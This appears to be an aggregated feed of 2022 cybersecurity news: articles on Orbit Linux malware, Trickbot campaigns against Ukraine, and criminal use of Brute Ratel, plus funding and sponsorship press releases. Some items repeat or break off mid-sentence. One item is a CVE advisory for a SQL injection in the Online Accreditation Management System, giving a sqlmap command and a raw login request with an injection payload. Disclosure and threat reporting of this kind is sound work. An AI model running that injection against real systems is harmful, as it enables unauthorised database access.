The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.

The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.

A sneaky malware for Linux is backdooring devices to steal data and can affect all the processes running on a particular machine, researchers have found.

The malware, dubbed Orbit, is unlike other Linux threats in that it steals information from different commands and utilities and then stores them in specific files on the machine, researchers from security automation firm Intezer discovered. In fact, the malware’s name comes from one of the filenames it to temporarily store the output of executed commands, they said.

Orbit can either achieve persistence on a machine or be installed as volatile implant, Intezer’s Nicole Fishbein explained in a blog post on Orbit published this week.

The malware sets itself apart from similar threats is its “almost hermetic hooking” of libraries on the targeted machines, which allows it to gain persistence and evade detection while stealing information and setting SSH backdoor, she said.

“The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands,” Fishbein wrote in the post.

Moreover, once Orbit is installed, it infects all of the running processes on the machine, including new ones, she said.

****Setting Itself Apart****

Typically, existing Linux threats such as Symbiote and HiddenWasp hijack shared Linux libraries by modifying the environment variable LD\_PRELOAD. Orbit works differently, however, using two different ways to load the malicious library, Fishbein wrote.

“The first way is by adding the shared object to the configuration file that is used by the loader,” she explained in the post. “The second way is by patching the binary of the loader itself so it will load the malicious shared object.”

Specifically, Orbit uses XOR encrypted strings and steals passwords, tactics that are similar to other Linux backdoors already reported by researchers at  ESET, Fishbein wrote.

But that’s where the similarity with how those backdoors hijack libraries ends, she said. Orbit goes a step further by not only stealing info from different commands and utilities, but implementing “an extensive usage of files” for storing the stolen data, something researchers have not seen before, Fishbein wrote.

****Installation and Execution****

Orbit loads onto a Linux machine or device via a dropper that not only installs the payload but also prepares the environment for the malware execution.

To install the payload and add it to the shared libraries that are being loaded by the dynamic linker, the dropper calls a function called patch\_ld and then the symbolic link of the dynamic linker /lib64/ld-linux-x86-64.so.2. The latter is done to check if the malicious payload is already loaded by searching for the path used by the malware, researchers said.

If the payload is found, the function can swap it with the other location, they noted. Otherwise, the dropper looks for /etc/ld.so.preload and replaces it with a symbolic link to the location of malicious library: /lib/libntpVnQE6mk/.l or /dev/shm/ldx/.l, depending on the argument passed to the dropper.

Lastly, the dropper will append /etc/ld.so.preload to the end of the temp file to make sure that the malicious library will be loaded first, researchers said.

The payload itself is a shared object (.SO file) that can be placed either in persistent storage or in shim-memory. “If it’s placed in the first path the malware will be persistent, otherwise it is volatile,” Fishbein wrote.

The shared object hooks functions from three libraries–libc, libcap and Pluggable Authentication Module (PAM). Once this is done, the existing processes that use these functions will essentially use the modified functions, and new processes will be hooked with the malicious library as well, researchers found.

This hooking allows the malware to infect the whole machine and harvest credentials, evade detection, gain persistence, and provide remote access to the attackers, Fishbein wrote.

****Evasion Tactics****

Orbit also hooks multiple functions as its strategy to evade detection, thus preventing them from releasing information that might reveal the existence of the malicious shared library either in the running processes or the files in use by Orbit, researchers noted.

“The malware uses a hardcoded GID value (the one set by the dropper) to identify the files and processes that are related to the malware and based on that it will manipulate the behavior of the hooked functions,” Fishbein wrote. In Linux, a GID is a numeric value used to represent a specific group.

As an example of this functionality, Orbit hooks readdir—a Linux function that returns a pointer to a dirent structure describing the next directory entry in the directory stream associated with dirp–to check the GID of the calling process, she explained.

“If it doesn’t match the hardcoded value, all of the directories with the predefined GID value will be omitted from the function’s output,” Fishbein wrote.

**Register Now for this LIVE EVENT on MONDAY JULY 11:** Join Threatpost and Intel Security’s Tom Garrison in a live conversation about innovation enabling stakeholders to stay ahead of a dynamic threat landscape and what Intel Security learned from their latest study in partnership with Ponemon Institue. Event attendees are encouraged to preview the report and ask questions during the live discussion. **Learn more and register here**.

Sneaky Orbit Malware Backdoors Linux Devices

Funding from Allianz X, Valor Equity Partners, Kinetic Partners, and existing investors will accelerate Coalition’s vision to provide security for all.

SAN FRANCISCO, July 08, 2022 (GLOBE NEWSWIRE) -- Coalition, the world’s first Active Insurance company designed to prevent digital risk before it strikes, today announced it has raised an additional $250 million to accelerate its rapid growth, power international expansion, and broaden the services Coalition offers to help organizations manage digital risk. This funding round closed in June with participation from Allianz X, Valor Equity Partners, Kinetic Partners and other existing investors, increasing Coalition’s valuation from $3.5 billion to $5 billion.  

Coalition’s Active Insurance combines industry-leading cybersecurity tools, access to around-the-clock digital forensics and incident response, and broad insurance coverage to help organizations identify, mitigate, and insure digital risk. Coalition’s technology advantage has allowed the company to build a sustainable, high-performing book of business in a highly-dynamic cyber market, while also helping Coalition customers spot and manage digital risk before it strikes. Coalition now serves over 160,000 customers with Active Cyber Insurance, Active Executive Risks Insurance, P&C insurance, and cybersecurity capabilities.

The new funding comes as Coalition continues its wave of growth at massive scale, exceeding $775 million in run rate GWP (gross written premium) and a nearly 200% increase in revenue growth over the prior year. Coalition partners with brokers in all 50 states to provide active cyber and active executive risks insurance and offers active cyber insurance across Canada. Later this year, Coalition will launch its UK active cyber program in partnership with Allianz, as announced last week.

“Many organizations remain unprotected in the face of rising digital threats, and neither traditional insurance nor cybersecurity alone is well equipped to help them,” said Joshua Motta, CEO and co-founder of Coalition. “Our active approach to underwriting, monitoring, and responding to digital risk has allowed Coalition to achieve market leading underwriting results while demonstrably reducing claims and losses for our customers so they can continue to thrive in the digital economy.”

“Coalition’s active, tech-based approach to cybersecurity and cyber insurance has proven to be profoundly effective, which is also reflected in its outstanding business results,” said Dr. Nazim Cetin, CEO of Allianz X. “The trends driving the importance of cyber defense are irreversible. We see an active approach as the most effective solution for addressing cyberthreats to businesses both now and in the future.”

“Coalition demonstrates clear market and technology leadership with growing network effects,” said Chris Golden, Founder and Chief Investment Officer at Kinetic Partners. “With the company’s high-quality culture and outstanding execution, we believe Coalition’s competitive advantages and value-creation will continue to compound in the coming years.”

Coalition has raised over $755 million in equity funding to date from leading global technology investors, including Durable Capital, T. Rowe Price Associates Inc, Whale Rock Capital, Index Ventures, General Atlantic, Ribbit Capital, Vy Capital and Valor Equity Partners, among others. Founded in 2017 by Joshua Motta and John Hering, Coalition is one of the largest cyber insurance and security providers in the United States and Canada.

To learn more about Coalition, visit coalitioninc.com. To learn more about Coalition cyber insurance in the UK, visit coalitioninc.co.uk

**About Coalition**  
Coalition is the leading provider of cyber insurance and security, combining comprehensive insurance and proactive cybersecurity tools to help businesses manage and mitigate cyber risk. Backed by leading global insurers Allianz, Swiss Re Corporate Solutions, Arch Insurance North America, Lloyd’s of London, and Ascot Group, Coalition offers its insurance products in the US and Canada and its security products to organizations globally. Coalition’s Active Risk Platform provides automated security alerts, threat intelligence, expert guidance, and cybersecurity tools to help businesses remain resilient in the face of cyber attacks. Headquartered in San Francisco, Coalition is a distributed company with a global workforce that collaborates both digitally and in office hubs across the globe.

**About Allianz X**  
Allianz X invests in digital frontrunners in ecosystems relevant to insurance and asset management. In just a few years, it has grown to a portfolio of more than 25 companies and AuM of over 2 billion euros. Allianz X has counted 11 unicorns among its portfolio so far. The heart and brains behind it all is a talented team of around 40 people. As one of the pillars of the Allianz Group’s digital transformation strategy, Allianz X provides an interface between Allianz Operating Entities and the broader digital ecosystem, enabling collaborative partnerships in insurtech, fintech, and beyond. As an investor, Allianz X supports mature digital growth companies to take the next bold leap and reach their full potential.

**About Kinetic Partners**  
Kinetic Partners Management, LP (“Kinetic”) is an investment firm focused on global public and private equities. Kinetic seeks to provide thought partnership, support, and capital to exceptional teams driving innovation. Kinetic was founded by Chris Golden and maintains offices in Miami, Florida and New York, New York.

Coalition Closes $250 Million in Series F Funding, Valuing the Cyber Insurance Provider at $5 Billion

The Colonial Pipeline and JBS attacks, among others, showed us our national resilience is only as strong as public-private sector collaboration.

As our nation's most critical infrastructure faces relentless threats in cyberspace, cybersecurity remains top-of-mind for the federal government. The Colonial Pipeline and JBS attacks, among others, showed us that our national resilience is only as strong as public-private sector collaboration. And as ransomware attacks remain the norm, new collaborative strategies and programs are underway to build and foster cyber resilience.

**Notable Steps in the Right Direction  
**

The State Department's Bureau of Cyberspace and Digital Policy (CDP) serves as a catalyst for building cyber stability, future incident reporting, and cyber-governance regulation. Its mission is to encourage responsible nation-state behavior in cyberspace, advance policies that protect the integrity and security of the Internet, serve US interests, promote competitiveness, and uphold democratic values.

We've also seen progress with the Cybersecurity and Infrastructure Security Agency's (CISA) new Shields Up program, which outlines guidance for public and private organizations to reduce the likelihood of a successful cyber intrusion. CISA's Jen Easterly emphasizes the program is all about "preparation, not panic."

The National Institute of Standards and Technology (NIST) also recently published guidance for securing enterprises against supply chain attacks targeting critical infrastructure. The new guidance stresses the importance of risk monitoring in cyber defense.

**Collaboration Across Sectors  
**

In addition to the above federal mandates and programs, public-private partnerships play a vital role in strengthening cyber intelligence, defense, and protection capabilities. As the world around us grows increasingly interconnected, cyber concerns that threaten to shut down or disrupt private entities also threaten the well-being of the federal government and government operations — and vice versa.

Because of attacks like Colonial Pipeline, President Biden signed the Cyber Incident Reporting for Critical Infrastructure Act of 2022 into law — which laid out new "mandatory reporting requirements for critical infrastructure entities in the event of certain cyber incidents and ransomware payments."

The commitment to public-private partnerships continues to show up at all levels of government and private sector operations. Another proof point: CISA established the Joint Cyber Defense Collaborative (JCDC) in August 2021 to unify defensive actions and mitigate risk in advance of cyber incidents. The goal of this program is to strengthen the nation's cyber defenses through innovative collaboration, advanced preparation, and information sharing and fusion.

Programs and mandates like these are critical steps in bolstering national cyber resiliency. But to achieve herd resilience, we need to work together to shore up our shared cyber defenses, and for many, that starts with adhering to basic cybersecurity protocol.

**Building Cyber Resilience  
**

A pivotal factor in building cyber resilience and proactively preparing for the next attack starts with ensuring your organization maintains good cyber hygiene. In a nutshell, cyber hygiene is the practice of fundamental security behaviors, amplified through the adoption of supporting processes and technical controls. It's nothing revolutionary — back up your data, patch when you're told to patch, segment your networks, micro-segment your applications and workloads, etc.

One proactive security framework that has gained popularity and more widespread adoption over the last several years is zero trust. The Biden Administration's Cyber EO, which recently hit its one-year anniversary, emphasized the immediate need for federal agencies to implement zero trust to bolster national cyber resilience.

A key component of achieving zero trust security is zero-trust segmentation (i.e., microsegmentation). It's designed to stop lateral movement and reduce the attack surface by breaking down the internal infrastructure (think the data center, cloud environment, network, etc.) into smaller segments. In simple terms, think of microsegmentation like a hotel. Just because you're able to get into the hotel (bypassing firewall defenses) doesn't mean you're able to automatically access your room. Because every room has a key, you can only access yours once you're checked in and your access is granted.

Microsegmentation is the critical component of the workload and application pillar of zero trust reference architecture and your zero-trust security strategy; it's designed to stop the spread of cyberattacks and, malware, by isolating workloads and devices across the entire hybrid attack surface. Successfully implementing zero trust takes effort but ensuring your security team has an action plan in place and is taking small steps forward will ultimately better position you and your software supply chain to combat and withstand evolving threats.

**Our Best Defense Against Cyber Threats  
**

When taking steps to improve cyber defenses, agencies and critical infrastructure organizations often first look to legacy solutions: upgrading their networks, focusing on user access, bolstering perimeter defenses, or making sure all devices that connect to the network are approved devices.

While those steps are important, they're only one piece of the puzzle, and they will not stop the lateral movement of cyberattacks. Just think back to SolarWinds, which went undetected in federal systems for more than 14 months. A proactive cyber strategy, coupled with increased public-private partnerships and adherence to strong cyber hygiene practices, are critical components of bolstering our national cybersecurity posture.

Zero Trust Bolsters Our National Defense Against Rising Cyber Threats

Latest campaigns are a break from its usual financially motivated attacks and appear aligned with Russian interests, security researchers say.

In a break from precedent, Russia's hitherto purely financially motivated Trickbot threat group has systematically been attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.

Researchers from IBM's X-Force threat intelligence group this week said they had uncovered two campaigns — and analyzed four others that Ukraine’s Computer Emergency Response Team (CERT-UA) disclosed — where Trickbot went after targets in Ukraine. The campaigns began after Russia’s invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to grab the attention of Ukrainian users — included some that are war-related.

The attacks highlight an unprecedented shift for Trickbot, and it's notable because threat groups in former Soviet Union states have typically avoided attacking targets in each other’s countries, IBM said.

Prior to the Russian invasion, ITG23, which is the name by which IBM tracks Trickbot, had not been known to target Ukraine. "Much of the group's malware was even configured to not execute on systems if the Ukrainian language was detected," IBM said in a report summarizing its findings this week. "ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection."

**Multiple Malware Tools**

IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads and a new malware encryption and obfuscation tool.

One of the two Trickbot campaigns that IBM uncovered was in early May. In those attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor on compromised systems. AnchorMail is a revamped version of Trickbot’s AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described the malware as notable for communicating with its command-and-control (C2) server using the DNS protocol.

The second recent Trickbot campaign that IBM X-Force researchers spotted occurred likely in late May or early June. In that campaign, Trickbot actors used an ISO image file — or archive file containing the contents of an optical disk — as part of an attack chain to drop the Cobalt Strike post-exploit attack kit on target system. In June, Trickbot users were observed exploiting the so-called “Follina” zero-day bug in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.

The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor; Metasploit attack payload, Meterpreter; and Cobalt Strike. In five of the six observed campaigns, Trickbot actors directly downloaded Cobalt Strike, AnchorMail, or Meterpreter on target systems — another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests "these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors."

IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to download malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically if the file is opened — provided the user has macros enabled. The new dropper for AnchorMail that IBM observed is in the form of a WinRAR Self Extracting Archive. The dropper is rigged to extract and execute a script for building and configuring AnchorMail on infected systems.

Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymously named malware to steal credentials to banking accounts. Over the years, the group evolved into a sort of initial access broker and a distributor for several ransomware and malware tools, most notably Conti and Ryuk and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.

Court documents in connection with the arrest of a key member of the group last year showed that nearly 20 cybercriminals — including several malware experts — collaborated in building the malware. A massive 2020 international law enforcement operation to take the threat actor down temporarily disrupted its activities but failed to stop them.

In Switch, Trickbot Group Now Attacking Ukrainian Targets

Dark Reading's digest of the other don't-miss stories of the week, including a new ransomware targeting QNAP gear, and a destructive attack against the College of the Desert that lingers on.

Cybercrime never sleeps — but editors do. To cap off this short Fourth of July week, Dark Reading's editors are collecting all of the interesting threat intelligence and cyber-incident stories that we just didn't get to earlier but would be remiss to not cover.  

We're talking a critical Cisco vulnerability, a Microsoft alert on upgrades to the Hive ransomware, QNAP issues, and a pair of cyberattacks.

In this week's "in case you missed it" (ICYMI) digest, read on for more about the following:

*   **Critical Cisco Security Vulnerability Allows Root Access to OS**
*   **Hive Ransomware Gets a Rust-y Upgrade**
*   **QNAP Warns on "Checkmate" Ransomware Attacks**
*   **"SHI-eesh": IT Giant Knocked Offline in Coordinated Cyberattack**
*   **California College Remains Offline After Ransomware Hit**

**Critical Cisco Security Vulnerability Allows Root Access to OS**

Cisco has rolled out patches for 10 security bugs, including a critical flaw that could allow cyberattackers to manipulate application source code, or configuration and critical system files.

The critical issue (CVE-2022-20812, CVSS severity score of 9.0) is a path-traversal vulnerability affecting the Cisco Expressway Series software and Cisco TelePresence VCS software, if they are in the default

"A vulnerability in the cluster database API of Cisco Expressway Series and Cisco TelePresence VCS could allow an authenticated, remote attacker with Administrator read-write privileges on the application to conduct absolute path traversal attacks on an affected device and overwrite files on the underlying operating system as a root user," according to the advisory, the latest since Cisco's last bug disclosure in May.

The vulnerability arises thanks to insufficient input validation of user-supplied command arguments, the networking giant noted.

"An attacker could exploit this vulnerability by authenticating to the system as an administrative read-write user and submitting crafted input to the affected command."

**Hive Ransomware Gets a Rust-y Upgrade**

The ransomware-as-a-service (RaaS) offering known as Hive has overhauled its infrastructure, using the programming language Rust.

That's the buzz from Microsoft, whose security researchers noted that Hive is an exemplar of adapting to the rapid change found in the underground economy.

"With its latest variant carrying several major upgrades, Hive also proves it’s one of the fastest-evolving ransomware families, exemplifying the continuously changing ransomware ecosystem," researchers said in a post this week. "The most notable changes include a full code migration to another programming language \[from GoLang to Rust\] and the use of a more complex encryption method."

Rust, a language also used by the BlackCat ransomware, allows advances in coding control, memory usage, resistance to reverse engineering, and access to a range cryptographic libraries, the researchers said.

As for the encryption, "the new Hive variant uses string encryption that can make it more evasive," according to the advisory. “The constants that are used to decrypt the same string sometimes differ across samples, making them an unreliable basis for detection.”

**QNAP Warns on "Checkmate" Ransomware Attacks**

QNAP, the network-attached storage (NAS) vendor, is flagging activity against its devices that results in the execution of the Checkmate ransomware.

The cyberattackers are specifically targeting SMB file-sharing services exposed to the Internet, using a dictionary attack to break accounts with weak passwords.

"Once the attacker successfully logs in to a device, they encrypt data in shared folders and leave a ransom note with the file name '!CHECKMATE\_DECRYPTION\_README' in each folder," according to QNAP's advisory this week. It added, "We are thoroughly investigating the case and will provide further information as soon as possible."

Customers of the Taiwan-based appliance maker have been suffering ongoing, relentless ransomware activity — which Dark Reading broke down earlier this week (along with potential defenses) in an extensive roundtable of experts.

To protect their businesses and avoid a ransomware checkmate, users should avoid exposing the SMB service to the internet and should employ strong passwords in any event.

**"SHI-eesh": IT Giant Knocked Offline in Coordinated Cyberattack**

IT-supplier bigwig SHI International said this week that it was the target of "a coordinated and professional malware attack."

The New Jersey-based vendor, which has 5,000 employees and 15,000 customers around the world, said that it moved quickly to stop the infection and minimize the impact on SHI’s systems and operations. That meant that some systems, such as SHI’s public websites and email, were knocked offline "while the attack was investigated and the integrity of those systems was assessed."

The SHI staff regained access to email, but as of Thursday the main website was still not operational. The company said in a website notice that IT teams continue to work to bring other systems back online.

It's unclear what the cyberattackers' goal was, but some researchers noted that a supply chain compromise attempt is a real possibility.

“Apart from being a large enterprise, SHI is a major software and hardware provider to several Fortune 500 companies, and while there is no evidence regarding third-party suppliers getting breached or customer data getting exfiltrated, this is certainly too close for comfort for many of their customers," Rajiv Pimplaskar, CEO at Dispersive Holdings, said via email.

**California College Remains Offline After Ransomware Hit**

As the latest example of what happens when IT isn't prepared for a hit, the 12,500-student College of the Desert, a community college in Palm Desert, Calif., remains offline after suffering which researchers suspect was a ransomware attack.

The cyberattack brought down the school's online services and campus phone lines on July 4. As of late Thursday, the school's website still returned a notice that it "is currently experiencing a system-wide outage of most services," including the ability for students to request transcripts, add or drop classes, or register for classes.

"Educational institutions have continued to be a prime target for ransomware groups over the last couple of years," says Josh Rickard, senior security solutions architect at Swimlane, noting that this is the second time College of the Desert has been hit with a malware attack; the first incident took place in August 2020. "To prevent similar attacks in the future and ensure that operations continue to run smoothly, education institutions such as College of the Desert need to devote more resources to information security teams, tools, processes, and products."

Rickard suspects the incident was ransomware due to the severe operational disruption, but it should be noted that College of the Desert has not confirmed that, admitting only to a "computer network disruption."

ICYMI: Critical Cisco RCE Bug, Microsoft Breaks Down Hive, SHI Cyberattack

In what's being described as an "unprecedented twist," the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.
The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such

In what's being described as an "unprecedented twist," the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022.

The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter.

Tracked under the names ITG23, Gold Blackburn, and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year.

But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications.

"ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection," IBM Security X-Force analyst Ole Villadsen said in a technical report.

A noticeable shift in the campaigns involves the use of never-before-seen Microsoft Excel downloaders and the deployment of CobaltStrike, Meterpreter, and AnchorMail as first-stage payloads. The attacks are said to have commenced in mid-April 2022.

Interestingly, the threat actor leveraged the specter of nuclear war in its email ruse to spread the AnchorMail implant, a tactic that would be repeated by the Russian nation-state group tracked as APT28 two months later to spread data-stealing malware in Ukraine.

What's more, the Cobalt Strike sample deployed as part of a May 2022 campaign utilized a new crypter dubbed Forest to evade detection, the latter of which has also been used in conjunction with the Bumblebee malware, lending credence to theories that the loader is being operated by the TrickBot gang.

"Ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year," Villadsen noted. "These campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups."

The development comes as Ukrainian media outlets have been targeted with phishing messages containing malware-laced documents that exploit the Follina vulnerability to drop the DarkCrystal RAT on compromised systems.

The Computer Emergency Response Team of Ukraine (CERT-UA) has also warned of intrusions conducted by a group called UAC-0056 that involves striking state organizations with staffing-themed lures to drop Cobalt Strike Beacons on the hosts.

The agency, last month, further pointed out the use of Royal Road RTF weaponizer by a China-based actor codenamed the Tonto Team (aka Karma Panda) to target scientific and technical enterprises and state bodies located in Russia with the Bisonal malware.

Attributing these attacks with medium confidence to the advanced persistent threat (APT) group, SentinelOne said the findings demonstrate "a continued effort" on the part of the Chinese intelligence apparatus to target a wide range of Russian-linked organizations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

TrickBot Malware Shifted its Focus on "Systematically" Targeting Ukraine

The latest criminal use of a legitimate red-teaming tool helps attackers stay under the radar and better access living-off-the-land binaries.

In a fresh campaign that takes a page from the advanced persistent threat known as APT29, hackers are shifting away from the Cobalt Strike post-exploitation toolkit, instead embracing Brute Ratel C4 (BRc4).

BRc4 is the latest upstart in the red-team tooling world; like Cobalt Strike, it's an adversarial attack simulation tool designed for penetration testers. It’s a command-and-control (C2) framework that's not easily detected by endpoint detection and response (EDR) technology or other anti-malware tools.

A report from Palo Alto Networks' Unit 42 research team found evidence of attackers subverting Brute Ratel's free licensing protections and utilizing the tool to run criminal attack campaigns.

The infrastructure they uncovered is extensive, researchers noted.

"In terms of C2, we found that the sample called home to an Amazon Web Services (AWS) IP address located in the United States over port 443," they explained. "Further, the X.509 certificate on the listening port was configured to impersonate Microsoft with an organization name of 'Microsoft' and organization unit of 'Security.'"

Pivoting on the certificate and other artifacts, "we identified a total of 41 malicious IP addresses, nine BRc4 samples, and an additional three organizations across North and South America who have been impacted by this tool so far," they added.

**Living-Off-the-Land Techniques**

Unit 42 said the sample utilizing BRc4 uses known APT29 techniques, including well-known cloud storage and online collaboration applications. In this case, the sample studied was packaged up as a self-contained ISO that included a Windows shortcut LNK file, a malicious payload library, and a legitimate copy of Microsoft OneDrive Updater.

"Attempts to execute the benign application from the ISO-mounted folder resulted in the loading of the malicious payload as a dependency through a technique known as DLL search order hijacking," the report explained.

This technique of using legitimate tools and native utilities is known as "living off the land," and threat actors are increasingly using living-off-the-land binaries (LOLBins) to drop malicious payloads.

Last week for instance, researchers with Cyble reported an uptick in LNK file-based builders growing in popularity on Dark Web marketplaces, as various malware families lean on them for payload delivery.

"We have observed a steadily increasing number of high-profile threat actors shifting back to .LNK files to deliver their payloads," the Cyble researchers wrote. "Typically, threat actors use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder."

**Where Red Team Tools Fit In**

Tools like Cobalt Strike and BRc4 aren't purely living-off-the-land approaches, "since you still have to introduce a piece of malware onto the system as opposed to using the operating systems built in tooling," explains Tim McGuffin, director of adversarial engineering at LARES Consulting.

However, these tools are nevertheless popular with attackers for their ability to evade detection mechanisms, fundamentally for the same reason as a living-off-the-land attack works — because they're otherwise viewed as legitimate software.

"Brute Ratel is an otherwise legitimate tool that might be present in victim networks," explains John Bambenek, principal threat hunter at Netenrich. "Since its use is likely whitelisted, it allows for attackers to operate more discretely than they would otherwise be able to do."

This is an unfortunate cycle that the security world has seen occur for a long time, as attackers are drawn to red-team tools like flies to honey.

According to Ivan Righi, senior cyber threat intelligence analyst for Digital Shadows, it's no surprise that BRc4 makes for an attractive tool. Not only does it have offensive security capabilities similar to Cobalt Strike that can be abused for malicious purpose, but it is also less known than Cobalt Strike.

"Many security solutions may not yet detect Brute Ratel as malicious, as opposed to Cobalt Strike, which is generally more well-known for being used for malicious purposes," Righi says.

According to McGuffin, security practitioners should be concerned about all toolkits like these, whether open source, commercial, or custom. But he believes that they shouldn't get caught up in the whack-a-mole game of detecting the framework or the tooling itself. Instead, they should focus on hardening their systems.

"An emphasis on endpoint hardening can be placed on prevention against any C2 tooling. An example is Microsoft's Attack Surface Reduction 'Application Allow-listing' guidance," he says. "The setting prevents unknown binaries from being introduced, and network egress hardening to prevent C2 callbacks to Command-and-Control servers."

Stealthy Cyber-Campaign Ditches Cobalt Strike for Rival 'Brute Ratel' Pen Test Tool

Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

Orlando, FL, July 6, 2022 – Fortress Information Security, the nation’s leading cybersecurity provider for critical infrastructure organizations with digitized assets, today joined the Open Web Application Security Project (OWASP) as a silver sponsor. Fortress has allocated a portion of that sponsorship to support the CycloneDX project focused on promoting a lightweight Software Bill of Materials (SBOM) standard for application security and supply chain component analysis.

OWASP is a nonprofit foundation that works to improve software security by making application security risks visible. OWASP activities include community-led open source software projects, over 250+ local chapters worldwide, tens of thousands of members, and industry-leading educational and training conferences.

“OWASP and the CycloneDX project are critical to making universal SBOM principles and standards a reality,” said Betsy Jones, chief operating officer of Fortress Information Security. “Bringing software developers and cybersecurity professionals together openly and collaboratively will foster the development of trusted SBOM solutions.”

Joined by Tony Turner, Fortress vice president of research and development and an OWASP chapter and project leader for over 10 years, Fortress utilizes multiple OWASP projects such as CycloneDX, SCVS, OWASP Risk Ranking methodology, and many others to secure critical infrastructure.

OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All projects, tools, documents, forums, and chapters are free and open to anyone interested in improving application security.

**About Fortress Information Security**  
Fortress Information Security secures critical industries from cybersecurity and operational threats stemming from vendors, assets, and software in their supply chains. Fortress is the only end-to-end platform that connects intelligence surrounding vendors, information technology and operational technology assets, and software through a holistic, fit-for-purpose approach. Fortress has also partnered with its customers and suppliers to form the Asset-to-Vendor (A2V) network, which facilitates the secure and seamless exchange of asset information and security intelligence, enabling collaborative workflows to better understand and remediate potential issues. Fortress serves critical industries such as energy, government, aerospace & defense, critical manufacturing, industrial automation, automotive, and healthcare.

**About OWASP**  
As the world’s largest non-profit organization concerned with software security, OWASP: supports the building of impactful projects; develops & nurtures communities through events and chapter meetings worldwide; and provides educational publications & resources to enable developers to write better software and security professionals to make the world’s software more secure.

Fortress Information Security Sponsors Open Web Application Security Project To Work on Industry-Wide Software Bill of Materials Standards

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than hyper-focused on cybersecurity — about the amount of information we share on our blog and social media profiles. Our blog serves as the main mouthpiece for Talos, but I’m also always talking to our audience, directly or indirectly, through social media channels, our podcasts, or out in the world at conferences. But during these conversations, readers may wonder if we’re indirectly “helping” the bad guys by pointing out what they’re doing wrong or what we are doing to track them. 

There will always be pros and cons to any type of disclosure of information at this level of cybersecurity. But it’s important to know that we don’t take this issue lightly. When we publicize a technique — whether it be in a blog post, conference talk or podcast — those attackers are actively using, it forces them to change tactics and take time to make tweaks and changes. Unfortunately, we alone do not have the power to bring an end to cybercrime. However, if we can increase the cost of doing business for a threat actor, it's a win for defenders and potential victims. As defenders, we must keep attackers out of their comfort zone and force them to innovate or perish. Without that information being out there publicly, these bad actors could keep using the same tactics indefinitely to infect other targets. 
